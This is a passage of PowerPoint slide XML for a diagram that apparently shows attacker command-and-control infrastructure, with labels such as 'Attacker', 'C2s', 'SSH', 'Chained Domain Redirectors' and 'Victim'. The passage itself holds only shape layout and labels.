                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13E2599-9525-4EAF-8AF4-A1118E93EA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8703219" y="3164856"/>
            <a:ext cx="1458095" cy="1434429"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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Graphic 16" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7CC9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1272" y="3360445"/>
            <a:ext cx="1038046" cy="1140710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66ED1E48-D78D-423A-B918-6E5B7DD2C170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8875682" y="3658620"/>
            <a:ext cx="1362974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="33987" y="4463788"/>
            <a:ext cx="2025421" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66DE040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10614134" y="4372954"/>
            <a:ext cx="1983886" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE1CDE-1653-4E16-BBC1-EF98913611BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1139318" y="1391288"/>
            <a:ext cx="1262778" cy="2539512"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512542B1-4F87-4D5B-B875-7F95D94A2EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="61" idx="1"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5255138" y="2638470"/>
            <a:ext cx="1629966" cy="1331037"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437CDFCD-726B-4F1C-B6BF-6314912BDF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10190271" y="3982177"/>
            <a:ext cx="476169" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054D947B-2C1C-422C-9FBA-731D38F90A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18299488">
            <a:off x="1285497" y="2389767"/>
            <a:ext cx="679548" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F08DCE1-A459-4216-A1BA-D56DE22057C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340738" y="2181270"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87829FF9-3F85-467E-A41B-4EFD715E162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361656" y="3524977"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1238964F-E530-481C-825F-8C9D9684787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444499" y="2073701"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056AC67E-9E81-4536-8C5A-AB36E411CB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627021" y="5905038"/>
            <a:ext cx="1012823" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>C2s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC1A1F5-A612-4D39-8855-1205363342CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1139318" y="2748641"/>
            <a:ext cx="1305181" cy="1182159"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B0E12-6E55-4DC5-B2A8-3D8260E7EAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18716022">
            <a:off x="1616042" y="2665268"/>
            <a:ext cx="754371" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEF0BB2-E964-46AB-897F-6776D777A931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3834196" y="2540368"/>
            <a:ext cx="506542" cy="98102"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65441D37-3790-4A74-ADF8-E89256D5BCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3821328" y="3982177"/>
            <a:ext cx="540328" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA8A0C54-3473-4C43-B0BA-E734B2F5A70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="62" idx="1"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276056" y="2733199"/>
            <a:ext cx="1581927" cy="1248978"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1408A326-8147-43E5-A18E-46B921D096C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4441603" y="5606326"/>
            <a:ext cx="4517656" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Chained Domain Redirectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 33" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8538EF2-3BF5-415F-82BF-4179CA5D280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429144" y="3247539"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Graphic 40" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAF1AC4-8B57-440D-A5FD-5ED049566E8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448461" y="4572485"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3606CF66-6E7B-43CB-86A9-C3703C57DB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1139318" y="3922479"/>
            <a:ext cx="1289826" cy="8321"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672EC95F-9A70-49DD-9494-1F7A453367EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547727" y="3572912"/>
            <a:ext cx="754371" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Connector 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05591B0-3F53-492A-9378-7E0827787B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139318" y="3930800"/>
            <a:ext cx="1309143" cy="1316625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Graphic 44" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85542E5-4B94-4ABB-834F-42FEE12D583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361656" y="1110788"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Graphic 45" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE7E114-4803-4852-98F7-F9D2A45C17B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382772" y="4582789"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Connector 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B3F250-743A-4D5D-8DE5-91EEE8491337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3842444" y="5138727"/>
            <a:ext cx="540328" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Connector 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9106B778-49E0-421A-8778-2E9FFEE80138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3817303" y="1391288"/>
            <a:ext cx="540328" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Straight Connector 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7877BD-A3FA-4376-BBFD-BA31B8FF247E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="63" idx="1"/>
            <a:endCxn id="45" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276056" y="1492172"/>
            <a:ext cx="1664427" cy="75816"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
